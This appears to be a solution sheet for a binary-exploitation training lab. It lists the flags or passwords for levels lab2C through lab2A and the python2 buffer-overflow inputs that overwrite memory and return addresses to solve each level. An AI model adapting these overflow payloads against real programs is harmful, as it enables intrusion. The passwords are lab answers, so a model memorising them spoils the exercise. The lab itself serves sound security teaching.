CRACKED LOGIN PASSWORDS

lab2C	- lab02start 
lab2B	- 1m_all_ab0ut_d4t_b33f
lab2A	- i_c4ll_wh4t_i_w4nt_n00b	
lab2end - D1d_y0u_enj0y_y0ur_cats?


Exploit Inputs
lab2C - $ /levels/lab02/lab2C $(python2 -c 'print "A"*15 + "\xef\xbe\xad\xde"')
lab2B - $ /levels/lab02/lab2B $(python2 -c "print 'A'*27 + '\xbd\x86\x04\x08' + '\xcc\xcc\xcc\xcc' + '\xd0\x87\x04\x08' ")
lab2A - $ (python2 -c 'print "A\x0a"*9 + "X"*12 + "\x00\x00\x00" + "B\x0a"*8 + "X"*12 + "\x00\x00\x00" + "B" + "C\x0a"*5 + "\xfd\x0a\x86\x0a\x04\x0a\x08\x0a"';cat) | /levels/lab02/lab2A
